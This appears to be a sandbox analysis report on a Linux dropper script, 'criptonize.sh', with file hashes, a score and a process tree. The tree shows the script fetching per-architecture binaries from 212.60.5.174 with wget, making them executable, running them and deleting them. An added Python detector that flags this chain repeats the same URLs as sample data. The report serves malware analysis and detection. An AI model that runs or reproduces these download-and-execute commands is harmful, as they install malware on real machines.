Resubmissions

27-08-2024 23:50
240827-3vw9rsxdrg (score 8/10)

27-08-2024 23:49
240827-3t1wkaxdpd (score 8/10)

27-08-2024 23:47
240827-3svyxsxdlf (score 8/10)

27-08-2024 23:45
240827-3rvlrsxdjc (score 3/10)

Analysis

  • max time kernel
    69s
  • max time network
    71s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags
    arch:mipsel
    image:debian9-mipsel-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    27-08-2024 23:45

General

  • Target

    criptonize.sh

  • Size

    9KB

  • MD5

    fe5b1cae588f9ad418e162262b65b865

  • SHA1

    c0ab765270f811bcdbb0ad9f4ed2871edcf58caf

  • SHA256

    5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405

  • SHA512

    b9c079cbb03cc31ba0163dbfe3d9a8fda594010717f48d29880496e31b3852fb90423e6291b1697e09c52d72f6bd1f4405021aa63d652a0c96853fff25055774

  • SSDEEP

    96:rK7IcSgf29gv+1XVYmm6Wdw9Iu8f/s2CIjTgSWuI:cERlnySeZy

Score
3/10

Malware Config

Signatures

  • Writes file to tmp directory (20 IoCs)

    Malware often drops required files in the /tmp directory.
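The behaviour behind this signature in the process tree below is a fixed loop: wget a per-architecture binary into /tmp, chmod 777 it, run it with the architecture name as its argument, rm it, and move on to the next architecture. The detector below is an added example, not the sandbox's own signature logic. It consumes process-start events shaped like the tree (PID, parent PID, executable, argv, plus a working-directory field that the report does not list and is assumed to be /tmp for the script), links download, chmod and exec events by parent PID and resolved target path, and reports every file that was staged in a temp directory and then executed, together with the download URLs and hosts as IOCs. The sample events are constructed from the report's x86_64 and mipsel entries, with a benign home-directory download added as a control.

```python
"""Detect the download-to-tmp / chmod / execute chain from process-start events.

Added example for this report, not sandbox code.  Events carry a working
directory (cwd), which the report does not list; /tmp is assumed for the script.
"""
import os
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse

TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = {"wget", "curl"}
OUTPUT_FLAGS = {"-O", "--output-document", "-o", "--output"}  # wget / curl output-file flags


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    cwd: str      # working directory (assumed; the report does not list it)
    exe: str      # resolved executable path
    argv: tuple   # full command line


def _resolve(cwd, operand):
    """Absolute path of a relative command-line operand such as ./criptonize.mips."""
    return os.path.normpath(os.path.join(cwd, operand))


def _in_tmp(path):
    return path.startswith(TMP_DIRS)


def classify(ev):
    """Reduce one event to (kind, path, detail); None for anything the chain does not use."""
    tool = os.path.basename(ev.exe)
    if tool in DOWNLOADERS:
        url = next((a for a in ev.argv if "://" in a), None)
        out = None
        for i, a in enumerate(ev.argv[:-1]):
            if a in OUTPUT_FLAGS and "://" not in ev.argv[i + 1]:  # curl -O takes no operand
                out = ev.argv[i + 1]
        if url and out is None:  # wget default name: last path component of the URL
            out = os.path.basename(urlparse(url).path) or "index.html"
        if url:
            return ("download", _resolve(ev.cwd, out), url)
    elif tool == "chmod" and len(ev.argv) >= 3:
        return ("chmod", _resolve(ev.cwd, ev.argv[-1]), ev.argv[1])
    elif _in_tmp(ev.exe):
        return ("exec", ev.exe, " ".join(ev.argv))
    return None


def detect(events):
    """Walk events in start order.  Returns (findings, iocs): one finding per file
    that the same parent downloaded into a temp dir and later executed, plus the
    URLs and hosts those downloads came from."""
    staged = defaultdict(lambda: {"pids": []})  # (ppid, path) -> what happened to it
    findings, urls = [], set()
    for ev in events:
        c = classify(ev)
        if c is None:
            continue
        kind, path, detail = c
        if not _in_tmp(path):  # downloads outside temp dirs are out of scope here
            continue
        rec = staged[(ev.ppid, path)]
        rec["pids"].append(ev.pid)
        if kind == "download":
            rec["url"] = detail
            urls.add(detail)
        elif kind == "chmod":
            rec["mode"] = detail
        elif kind == "exec" and "url" in rec:
            findings.append({"parent": ev.ppid, "path": path, "url": rec["url"],
                             "mode": rec.get("mode"), "pids": tuple(rec["pids"]),
                             "cmdline": detail})
    hosts = sorted({urlparse(u).hostname for u in urls})
    return findings, {"urls": sorted(urls), "hosts": hosts}


# Constructed from the report's process tree (cwd assumed); PID 950 is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(708, 1, "/tmp", "/tmp/criptonize.sh", ("/tmp/criptonize.sh",)),
    ProcEvent(710, 708, "/tmp", "/bin/rm", ("rm", "-f", "criptonize.x86_64")),
    ProcEvent(711, 708, "/tmp", "/usr/bin/wget",
              ("wget", "-O", "criptonize.x86_64", "http://212.60.5.174/criptonize.x86_64")),
    ProcEvent(733, 708, "/tmp", "/bin/chmod", ("chmod", "777", "criptonize.x86_64")),
    ProcEvent(734, 708, "/tmp", "/tmp/criptonize.x86_64", ("./criptonize.x86_64", "x86_64")),
    ProcEvent(738, 708, "/tmp", "/bin/rm", ("rm", "-f", "criptonize.x86_64")),
    ProcEvent(891, 708, "/tmp", "/bin/rm", ("rm", "-f", "criptonize.mipsel")),
    ProcEvent(892, 708, "/tmp", "/usr/bin/wget",
              ("wget", "-O", "criptonize.mipsel", "http://212.60.5.174/criptonize.mipsel")),
    ProcEvent(893, 708, "/tmp", "/bin/chmod", ("chmod", "777", "criptonize.mipsel")),
    ProcEvent(894, 708, "/tmp", "/tmp/criptonize.mipsel", ("./criptonize.mipsel", "mipsel")),
    ProcEvent(950, 900, "/home/user", "/usr/bin/wget",
              ("wget", "-O", "notes.txt", "http://example.com/notes.txt")),
]

if __name__ == "__main__":
    found, iocs = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['path']} <- {f['url']} (chmod {f['mode']}, pids {f['pids']})")
    print("hosts:", iocs["hosts"])
```

Keying on (parent PID, resolved path) rather than on the downloader alone is what separates this from a plain "wget ran" alert: a file fetched into /tmp but never executed, or executed without an observed download under the same parent, produces no finding (the script itself, PID 708, falls into the second case because the sandbox placed it there). The rm that follows each run is deliberately not part of the match, since by the time a responder looks the file is already gone.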

Processes

  • /tmp/criptonize.sh
    /tmp/criptonize.sh
    1⤵
      PID:708
      • /bin/rm
        rm -f criptonize.x86_64
        2⤵
          PID:710
      • /usr/bin/wget
        wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64
        2⤵
        • Writes file to tmp directory
          PID:711
      • /bin/chmod
        chmod 777 criptonize.x86_64
        2⤵
          PID:733
      • /tmp/criptonize.x86_64
        ./criptonize.x86_64 x86_64
        2⤵
          PID:734
      • /bin/rm
        rm -f criptonize.x86_64
        2⤵
          PID:738
      • /bin/rm
        rm -f criptonize.i686
        2⤵
          PID:739
      • /usr/bin/wget
        wget -O criptonize.i686 http://212.60.5.174/criptonize.i686
        2⤵
        • Writes file to tmp directory
          PID:740
      • /bin/chmod
        chmod 777 criptonize.i686
        2⤵
          PID:818
      • /tmp/criptonize.i686
        ./criptonize.i686 i686
        2⤵
          PID:819
      • /bin/rm
        rm -f criptonize.i686
        2⤵
          PID:821
      • /bin/rm
        rm -f criptonize.i586
        2⤵
          PID:822
      • /usr/bin/wget
        wget -O criptonize.i586 http://212.60.5.174/criptonize.i586
        2⤵
        • Writes file to tmp directory
          PID:823
      • /bin/chmod
        chmod 777 criptonize.i586
        2⤵
          PID:824
      • /tmp/criptonize.i586
        ./criptonize.i586 i586
        2⤵
          PID:825
      • /bin/rm
        rm -f criptonize.i586
        2⤵
          PID:827
      • /bin/rm
        rm -f criptonize.i486
        2⤵
          PID:828
      • /usr/bin/wget
        wget -O criptonize.i486 http://212.60.5.174/criptonize.i486
        2⤵
        • Writes file to tmp directory
          PID:829
      • /bin/chmod
        chmod 777 criptonize.i486
        2⤵
          PID:830
      • /tmp/criptonize.i486
        ./criptonize.i486 i486
        2⤵
          PID:831
      • /bin/rm
        rm -f criptonize.i486
        2⤵
          PID:833
      • /bin/rm
        rm -f criptonize.aarch64
        2⤵
          PID:834
      • /usr/bin/wget
        wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64
        2⤵
        • Writes file to tmp directory
          PID:835
      • /bin/chmod
        chmod 777 criptonize.aarch64
        2⤵
          PID:836
      • /tmp/criptonize.aarch64
        ./criptonize.aarch64 aarch64
        2⤵
          PID:837
      • /bin/rm
        rm -f criptonize.aarch64
        2⤵
          PID:839
      • /bin/rm
        rm -f criptonize.armv7l
        2⤵
          PID:840
      • /usr/bin/wget
        wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l
        2⤵
        • Writes file to tmp directory
          PID:841
      • /bin/chmod
        chmod 777 criptonize.armv7l
        2⤵
          PID:845
      • /tmp/criptonize.armv7l
        ./criptonize.armv7l armv7l
        2⤵
          PID:846
      • /bin/rm
        rm -f criptonize.armv7l
        2⤵
          PID:848
      • /bin/rm
        rm -f criptonize.armv6l
        2⤵
          PID:849
      • /usr/bin/wget
        wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l
        2⤵
        • Writes file to tmp directory
          PID:850
      • /bin/chmod
        chmod 777 criptonize.armv6l
        2⤵
          PID:851
      • /tmp/criptonize.armv6l
        ./criptonize.armv6l armv6l
        2⤵
          PID:852
      • /bin/rm
        rm -f criptonize.armv6l
        2⤵
          PID:854
      • /bin/rm
        rm -f criptonize.armv5l
        2⤵
          PID:855
      • /usr/bin/wget
        wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l
        2⤵
        • Writes file to tmp directory
          PID:856
      • /bin/chmod
        chmod 777 criptonize.armv5l
        2⤵
          PID:857
      • /tmp/criptonize.armv5l
        ./criptonize.armv5l armv5l
        2⤵
          PID:858
      • /bin/rm
        rm -f criptonize.armv5l
        2⤵
          PID:860
      • /bin/rm
        rm -f criptonize.armv4eb
        2⤵
          PID:861
      • /usr/bin/wget
        wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb
        2⤵
        • Writes file to tmp directory
          PID:862
      • /bin/chmod
        chmod 777 criptonize.armv4eb
        2⤵
          PID:863
      • /tmp/criptonize.armv4eb
        ./criptonize.armv4eb armv4eb
        2⤵
          PID:864
      • /bin/rm
        rm -f criptonize.armv4eb
        2⤵
          PID:866
      • /bin/rm
        rm -f criptonize.armv4tl
        2⤵
          PID:867
      • /usr/bin/wget
        wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl
        2⤵
        • Writes file to tmp directory
          PID:868
      • /bin/chmod
        chmod 777 criptonize.armv4tl
        2⤵
          PID:869
      • /tmp/criptonize.armv4tl
        ./criptonize.armv4tl armv4tl
        2⤵
          PID:870
      • /bin/rm
        rm -f criptonize.armv4tl
        2⤵
          PID:872
      • /bin/rm
        rm -f criptonize.armv4l
        2⤵
          PID:873
      • /usr/bin/wget
        wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l
        2⤵
        • Writes file to tmp directory
          PID:874
      • /bin/chmod
        chmod 777 criptonize.armv4l
        2⤵
          PID:875
      • /tmp/criptonize.armv4l
        ./criptonize.armv4l armv4l
        2⤵
          PID:876
      • /bin/rm
        rm -f criptonize.armv4l
        2⤵
          PID:878
      • /bin/rm
        rm -f criptonize.mips64
        2⤵
          PID:879
      • /usr/bin/wget
        wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64
        2⤵
        • Writes file to tmp directory
          PID:880
      • /bin/chmod
        chmod 777 criptonize.mips64
        2⤵
          PID:881
      • /tmp/criptonize.mips64
        ./criptonize.mips64 mips64
        2⤵
          PID:882
      • /bin/rm
        rm -f criptonize.mips64
        2⤵
          PID:884
      • /bin/rm
        rm -f criptonize.mips
        2⤵
          PID:885
      • /usr/bin/wget
        wget -O criptonize.mips http://212.60.5.174/criptonize.mips
        2⤵
        • Writes file to tmp directory
          PID:886
      • /bin/chmod
        chmod 777 criptonize.mips
        2⤵
          PID:887
      • /tmp/criptonize.mips
        ./criptonize.mips mips
        2⤵
          PID:888
      • /bin/rm
        rm -f criptonize.mips
        2⤵
          PID:890
      • /bin/rm
        rm -f criptonize.mipsel
        2⤵
          PID:891
      • /usr/bin/wget
        wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel
        2⤵
        • Writes file to tmp directory
          PID:892
      • /bin/chmod
        chmod 777 criptonize.mipsel
        2⤵
          PID:893
      • /tmp/criptonize.mipsel
        ./criptonize.mipsel mipsel
        2⤵
          PID:894
      • /bin/rm
        rm -f criptonize.mipsel
        2⤵
          PID:895
      • /bin/rm
        rm -f criptonize.powerpc
        2⤵
          PID:896
      • /usr/bin/wget
        wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc
        2⤵
        • Writes file to tmp directory
          PID:897
      • /bin/chmod
        chmod 777 criptonize.powerpc
        2⤵
          PID:898
      • /tmp/criptonize.powerpc
        ./criptonize.powerpc powerpc
        2⤵
          PID:899
      • /bin/rm
        rm -f criptonize.powerpc
        2⤵
          PID:901
      • /bin/rm
        rm -f criptonize.m68k
        2⤵
          PID:902
      • /usr/bin/wget
        wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k
        2⤵
        • Writes file to tmp directory
          PID:903
      • /bin/chmod
        chmod 777 criptonize.m68k
        2⤵
          PID:904
      • /tmp/criptonize.m68k
        ./criptonize.m68k m68k
        2⤵
          PID:905
      • /bin/rm
        rm -f criptonize.m68k
        2⤵
          PID:907
      • /bin/rm
        rm -f criptonize.sh4
        2⤵
          PID:908
      • /usr/bin/wget
        wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4
        2⤵
        • Writes file to tmp directory
          PID:909
      • /bin/chmod
        chmod 777 criptonize.sh4
        2⤵
          PID:910
      • /tmp/criptonize.sh4
        ./criptonize.sh4 sh4
        2⤵
          PID:911
      • /bin/rm
        rm -f criptonize.sh4
        2⤵
          PID:913
      • /bin/rm
        rm -f criptonize.sparc
        2⤵
          PID:914
      • /usr/bin/wget
                                                                                                                                                  wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc
                                                                                                                                                  2⤵
                                                                                                                                                  • Writes file to tmp directory
                                                                                                                                                  PID:915
                                                                                                                                                • /bin/chmod
                                                                                                                                                  chmod 777 criptonize.sparc
                                                                                                                                                  2⤵
                                                                                                                                                    PID:916
                                                                                                                                                  • /tmp/criptonize.sparc
                                                                                                                                                    ./criptonize.sparc sparc
                                                                                                                                                    2⤵
                                                                                                                                                      PID:917
                                                                                                                                                    • /bin/rm
                                                                                                                                                      rm -f criptonize.sparc
                                                                                                                                                      2⤵
                                                                                                                                                        PID:919
                                                                                                                                                      • /bin/rm
                                                                                                                                                        rm -f criptonize.arc700
                                                                                                                                                        2⤵
                                                                                                                                                          PID:920
                                                                                                                                                        • /usr/bin/wget
                                                                                                                                                          wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700
                                                                                                                                                          2⤵
                                                                                                                                                          • Writes file to tmp directory
                                                                                                                                                          PID:921
                                                                                                                                                        • /bin/chmod
                                                                                                                                                          chmod 777 criptonize.arc700
                                                                                                                                                          2⤵
                                                                                                                                                            PID:922
                                                                                                                                                          • /tmp/criptonize.arc700
                                                                                                                                                            ./criptonize.arc700 arc700
                                                                                                                                                            2⤵
                                                                                                                                                              PID:923
                                                                                                                                                            • /bin/rm
                                                                                                                                                              rm -f criptonize.arc700
                                                                                                                                                              2⤵
                                                                                                                                                                PID:925
                                                                                                                                                              • /bin/rm
                                                                                                                                                                rm -f criptonize.bsdamd64
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:926
                                                                                                                                                                • /usr/bin/wget
                                                                                                                                                                  wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Writes file to tmp directory
                                                                                                                                                                  PID:927
                                                                                                                                                                • /bin/chmod
                                                                                                                                                                  chmod 777 criptonize.bsdamd64
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:928
                                                                                                                                                                  • /tmp/criptonize.bsdamd64
                                                                                                                                                                    ./criptonize.bsdamd64 bsdamd64
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:929
                                                                                                                                                                    • /bin/rm
                                                                                                                                                                      rm -f criptonize.bsdamd64
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:931

Network

MITRE ATT&CK Matrix


Downloads